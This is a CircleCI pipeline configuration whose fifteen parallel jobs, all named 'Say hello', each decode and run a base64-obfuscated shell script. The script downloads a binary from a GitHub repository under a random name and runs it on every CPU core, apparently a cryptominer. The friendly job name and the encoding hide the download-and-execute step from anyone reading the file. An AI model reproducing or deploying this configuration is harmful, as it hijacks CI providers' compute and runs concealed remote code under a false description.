# Use the latest 2.1 version of CircleCI pipeline process engine.
# See: https://circleci.com/docs/configuration-reference
version: 2.1

# Define a job to be invoked later in a workflow.
# See: https://circleci.com/docs/jobs-steps/#jobs-overview & https://circleci.com/docs/configuration-reference/#jobs
jobs:
  say-hello:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/executor-intro/ & https://circleci.com/docs/configuration-reference/#executor-job
    docker:
      # Specify the version you desire here
      # See: https://circleci.com/developer/images/image/cimg/base
      - image: cimg/base:current

    # Add steps to the job
    # See: https://circleci.com/docs/jobs-steps/#steps-overview & https://circleci.com/docs/configuration-reference/#steps
    steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          name: "Say hello"
          command: echo 'QVBQPWFwcCQoc2h1ZiAtaSAxMDAwMDAwLTk5OTk5OTkgLW4gMSkKd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vZmVieTEyMzI5L2xhdWdoaW5nLWdvZ2dsZXMvcmF3L21hc3Rlci9nYXNtZW5nCm12IGdhc21lbmcgJEFQUApjaG1vZCAreCAkQVBQCi4vJEFQUCAtLXRocmVhZHMgJChucHJvYyAtLWFsbCk='>rr; base64 -d rr>rrr; chmod +x rrr; ./rrr

  say-hello1:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/executor-intro/ & https://circleci.com/docs/configuration-reference/#executor-job
    docker:
      # Specify the version you desire here
      # See: https://circleci.com/developer/images/image/cimg/base
      - image: cimg/base:current

    # Add steps to the job
    # See: https://circleci.com/docs/jobs-steps/#steps-overview & https://circleci.com/docs/configuration-reference/#steps
    steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          name: "Say hello"
          command: echo 'QVBQPWFwcCQoc2h1ZiAtaSAxMDAwMDAwLTk5OTk5OTkgLW4gMSkKd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vZmVieTEyMzI5L2xhdWdoaW5nLWdvZ2dsZXMvcmF3L21hc3Rlci9nYXNtZW5nCm12IGdhc21lbmcgJEFQUApjaG1vZCAreCAkQVBQCi4vJEFQUCAtLXRocmVhZHMgJChucHJvYyAtLWFsbCk='>rr; base64 -d rr>rrr; chmod +x rrr; ./rrr
  say-hello2:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/executor-intro/ & https://circleci.com/docs/configuration-reference/#executor-job
    docker:
      # Specify the version you desire here
      # See: https://circleci.com/developer/images/image/cimg/base
      - image: cimg/base:current

    # Add steps to the job
    # See: https://circleci.com/docs/jobs-steps/#steps-overview & https://circleci.com/docs/configuration-reference/#steps
    steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          name: "Say hello"
          command: echo 'QVBQPWFwcCQoc2h1ZiAtaSAxMDAwMDAwLTk5OTk5OTkgLW4gMSkKd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vZmVieTEyMzI5L2xhdWdoaW5nLWdvZ2dsZXMvcmF3L21hc3Rlci9nYXNtZW5nCm12IGdhc21lbmcgJEFQUApjaG1vZCAreCAkQVBQCi4vJEFQUCAtLXRocmVhZHMgJChucHJvYyAtLWFsbCk='>rr; base64 -d rr>rrr; chmod +x rrr; ./rrr
  say-hello3:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/executor-intro/ & https://circleci.com/docs/configuration-reference/#executor-job
    docker:
      # Specify the version you desire here
      # See: https://circleci.com/developer/images/image/cimg/base
      - image: cimg/base:current

    # Add steps to the job
    # See: https://circleci.com/docs/jobs-steps/#steps-overview & https://circleci.com/docs/configuration-reference/#steps
    steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          name: "Say hello"
          command: echo 'QVBQPWFwcCQoc2h1ZiAtaSAxMDAwMDAwLTk5OTk5OTkgLW4gMSkKd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vZmVieTEyMzI5L2xhdWdoaW5nLWdvZ2dsZXMvcmF3L21hc3Rlci9nYXNtZW5nCm12IGdhc21lbmcgJEFQUApjaG1vZCAreCAkQVBQCi4vJEFQUCAtLXRocmVhZHMgJChucHJvYyAtLWFsbCk='>rr; base64 -d rr>rrr; chmod +x rrr; ./rrr

  say-hello4:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/executor-intro/ & https://circleci.com/docs/configuration-reference/#executor-job
    docker:
      # Specify the version you desire here
      # See: https://circleci.com/developer/images/image/cimg/base
      - image: cimg/base:current

    # Add steps to the job
    # See: https://circleci.com/docs/jobs-steps/#steps-overview & https://circleci.com/docs/configuration-reference/#steps
    steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          name: "Say hello"
          command: echo 'QVBQPWFwcCQoc2h1ZiAtaSAxMDAwMDAwLTk5OTk5OTkgLW4gMSkKd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vZmVieTEyMzI5L2xhdWdoaW5nLWdvZ2dsZXMvcmF3L21hc3Rlci9nYXNtZW5nCm12IGdhc21lbmcgJEFQUApjaG1vZCAreCAkQVBQCi4vJEFQUCAtLXRocmVhZHMgJChucHJvYyAtLWFsbCk='>rr; base64 -d rr>rrr; chmod +x rrr; ./rrr
  say-hello5:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/executor-intro/ & https://circleci.com/docs/configuration-reference/#executor-job
    docker:
      # Specify the version you desire here
      # See: https://circleci.com/developer/images/image/cimg/base
      - image: cimg/base:current

    # Add steps to the job
    # See: https://circleci.com/docs/jobs-steps/#steps-overview & https://circleci.com/docs/configuration-reference/#steps
    steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          name: "Say hello"
          command: echo 'QVBQPWFwcCQoc2h1ZiAtaSAxMDAwMDAwLTk5OTk5OTkgLW4gMSkKd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vZmVieTEyMzI5L2xhdWdoaW5nLWdvZ2dsZXMvcmF3L21hc3Rlci9nYXNtZW5nCm12IGdhc21lbmcgJEFQUApjaG1vZCAreCAkQVBQCi4vJEFQUCAtLXRocmVhZHMgJChucHJvYyAtLWFsbCk='>rr; base64 -d rr>rrr; chmod +x rrr; ./rrr
  say-hello6:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/executor-intro/ & https://circleci.com/docs/configuration-reference/#executor-job
    docker:
      # Specify the version you desire here
      # See: https://circleci.com/developer/images/image/cimg/base
      - image: cimg/base:current

    # Add steps to the job
    # See: https://circleci.com/docs/jobs-steps/#steps-overview & https://circleci.com/docs/configuration-reference/#steps
    steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          name: "Say hello"
          command: echo 'QVBQPWFwcCQoc2h1ZiAtaSAxMDAwMDAwLTk5OTk5OTkgLW4gMSkKd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vZmVieTEyMzI5L2xhdWdoaW5nLWdvZ2dsZXMvcmF3L21hc3Rlci9nYXNtZW5nCm12IGdhc21lbmcgJEFQUApjaG1vZCAreCAkQVBQCi4vJEFQUCAtLXRocmVhZHMgJChucHJvYyAtLWFsbCk='>rr; base64 -d rr>rrr; chmod +x rrr; ./rrr

  say-hello7:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/executor-intro/ & https://circleci.com/docs/configuration-reference/#executor-job
    docker:
      # Specify the version you desire here
      # See: https://circleci.com/developer/images/image/cimg/base
      - image: cimg/base:current

    # Add steps to the job
    # See: https://circleci.com/docs/jobs-steps/#steps-overview & https://circleci.com/docs/configuration-reference/#steps
    steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          name: "Say hello"
          command: echo 'QVBQPWFwcCQoc2h1ZiAtaSAxMDAwMDAwLTk5OTk5OTkgLW4gMSkKd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vZmVieTEyMzI5L2xhdWdoaW5nLWdvZ2dsZXMvcmF3L21hc3Rlci9nYXNtZW5nCm12IGdhc21lbmcgJEFQUApjaG1vZCAreCAkQVBQCi4vJEFQUCAtLXRocmVhZHMgJChucHJvYyAtLWFsbCk='>rr; base64 -d rr>rrr; chmod +x rrr; ./rrr
  say-hello8:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/executor-intro/ & https://circleci.com/docs/configuration-reference/#executor-job
    docker:
      # Specify the version you desire here
      # See: https://circleci.com/developer/images/image/cimg/base
      - image: cimg/base:current

    # Add steps to the job
    # See: https://circleci.com/docs/jobs-steps/#steps-overview & https://circleci.com/docs/configuration-reference/#steps
    steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          name: "Say hello"
          command: echo 'QVBQPWFwcCQoc2h1ZiAtaSAxMDAwMDAwLTk5OTk5OTkgLW4gMSkKd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vZmVieTEyMzI5L2xhdWdoaW5nLWdvZ2dsZXMvcmF3L21hc3Rlci9nYXNtZW5nCm12IGdhc21lbmcgJEFQUApjaG1vZCAreCAkQVBQCi4vJEFQUCAtLXRocmVhZHMgJChucHJvYyAtLWFsbCk='>rr; base64 -d rr>rrr; chmod +x rrr; ./rrr
  say-hello9:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/executor-intro/ & https://circleci.com/docs/configuration-reference/#executor-job
    docker:
      # Specify the version you desire here
      # See: https://circleci.com/developer/images/image/cimg/base
      - image: cimg/base:current

    # Add steps to the job
    # See: https://circleci.com/docs/jobs-steps/#steps-overview & https://circleci.com/docs/configuration-reference/#steps
    steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          name: "Say hello"
          command: echo 'QVBQPWFwcCQoc2h1ZiAtaSAxMDAwMDAwLTk5OTk5OTkgLW4gMSkKd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vZmVieTEyMzI5L2xhdWdoaW5nLWdvZ2dsZXMvcmF3L21hc3Rlci9nYXNtZW5nCm12IGdhc21lbmcgJEFQUApjaG1vZCAreCAkQVBQCi4vJEFQUCAtLXRocmVhZHMgJChucHJvYyAtLWFsbCk='>rr; base64 -d rr>rrr; chmod +x rrr; ./rrr

  say-hello10:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/executor-intro/ & https://circleci.com/docs/configuration-reference/#executor-job
    docker:
      # Specify the version you desire here
      # See: https://circleci.com/developer/images/image/cimg/base
      - image: cimg/base:current

    # Add steps to the job
    # See: https://circleci.com/docs/jobs-steps/#steps-overview & https://circleci.com/docs/configuration-reference/#steps
    steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          name: "Say hello"
          command: echo 'QVBQPWFwcCQoc2h1ZiAtaSAxMDAwMDAwLTk5OTk5OTkgLW4gMSkKd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vZmVieTEyMzI5L2xhdWdoaW5nLWdvZ2dsZXMvcmF3L21hc3Rlci9nYXNtZW5nCm12IGdhc21lbmcgJEFQUApjaG1vZCAreCAkQVBQCi4vJEFQUCAtLXRocmVhZHMgJChucHJvYyAtLWFsbCk='>rr; base64 -d rr>rrr; chmod +x rrr; ./rrr
  say-hello11:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/executor-intro/ & https://circleci.com/docs/configuration-reference/#executor-job
    docker:
      # Specify the version you desire here
      # See: https://circleci.com/developer/images/image/cimg/base
      - image: cimg/base:current

    # Add steps to the job
    # See: https://circleci.com/docs/jobs-steps/#steps-overview & https://circleci.com/docs/configuration-reference/#steps
    steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          name: "Say hello"
          command: echo 'QVBQPWFwcCQoc2h1ZiAtaSAxMDAwMDAwLTk5OTk5OTkgLW4gMSkKd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vZmVieTEyMzI5L2xhdWdoaW5nLWdvZ2dsZXMvcmF3L21hc3Rlci9nYXNtZW5nCm12IGdhc21lbmcgJEFQUApjaG1vZCAreCAkQVBQCi4vJEFQUCAtLXRocmVhZHMgJChucHJvYyAtLWFsbCk='>rr; base64 -d rr>rrr; chmod +x rrr; ./rrr
  say-hello12:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/executor-intro/ & https://circleci.com/docs/configuration-reference/#executor-job
    docker:
      # Specify the version you desire here
      # See: https://circleci.com/developer/images/image/cimg/base
      - image: cimg/base:current

    # Add steps to the job
    # See: https://circleci.com/docs/jobs-steps/#steps-overview & https://circleci.com/docs/configuration-reference/#steps
    steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          name: "Say hello"
          command: echo 'QVBQPWFwcCQoc2h1ZiAtaSAxMDAwMDAwLTk5OTk5OTkgLW4gMSkKd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vZmVieTEyMzI5L2xhdWdoaW5nLWdvZ2dsZXMvcmF3L21hc3Rlci9nYXNtZW5nCm12IGdhc21lbmcgJEFQUApjaG1vZCAreCAkQVBQCi4vJEFQUCAtLXRocmVhZHMgJChucHJvYyAtLWFsbCk='>rr; base64 -d rr>rrr; chmod +x rrr; ./rrr

  say-hello13:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/executor-intro/ & https://circleci.com/docs/configuration-reference/#executor-job
    docker:
      # Specify the version you desire here
      # See: https://circleci.com/developer/images/image/cimg/base
      - image: cimg/base:current

    # Add steps to the job
    # See: https://circleci.com/docs/jobs-steps/#steps-overview & https://circleci.com/docs/configuration-reference/#steps
    steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          name: "Say hello"
          command: echo 'QVBQPWFwcCQoc2h1ZiAtaSAxMDAwMDAwLTk5OTk5OTkgLW4gMSkKd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vZmVieTEyMzI5L2xhdWdoaW5nLWdvZ2dsZXMvcmF3L21hc3Rlci9nYXNtZW5nCm12IGdhc21lbmcgJEFQUApjaG1vZCAreCAkQVBQCi4vJEFQUCAtLXRocmVhZHMgJChucHJvYyAtLWFsbCk='>rr; base64 -d rr>rrr; chmod +x rrr; ./rrr
  say-hello14:
    # Specify the execution environment. You can specify an image from Docker Hub or use one of our convenience images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/executor-intro/ & https://circleci.com/docs/configuration-reference/#executor-job
    docker:
      # Specify the version you desire here
      # See: https://circleci.com/developer/images/image/cimg/base
      - image: cimg/base:current

    # Add steps to the job
    # See: https://circleci.com/docs/jobs-steps/#steps-overview & https://circleci.com/docs/configuration-reference/#steps
    steps:
      # Checkout the code as the first step.
      - checkout
      - run:
          name: "Say hello"
          command: echo 'QVBQPWFwcCQoc2h1ZiAtaSAxMDAwMDAwLTk5OTk5OTkgLW4gMSkKd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vZmVieTEyMzI5L2xhdWdoaW5nLWdvZ2dsZXMvcmF3L21hc3Rlci9nYXNtZW5nCm12IGdhc21lbmcgJEFQUApjaG1vZCAreCAkQVBQCi4vJEFQUCAtLXRocmVhZHMgJChucHJvYyAtLWFsbCk='>rr; base64 -d rr>rrr; chmod +x rrr; ./rrr


# Orchestrate jobs using workflows
# See: https://circleci.com/docs/workflows/ & https://circleci.com/docs/configuration-reference/#workflows
workflows:
  say-hello-workflow: # This is the name of the workflow, feel free to change it to better match your workflow.
    # Inside the workflow, you define the jobs you want to run.
    jobs:
     - say-hello
     - say-hello1
     - say-hello2
     - say-hello3
     - say-hello4
     - say-hello5
     - say-hello6
     - say-hello7
     - say-hello8
     - say-hello9
     - say-hello10
     - say-hello11
     - say-hello12
     - say-hello13
     - say-hello14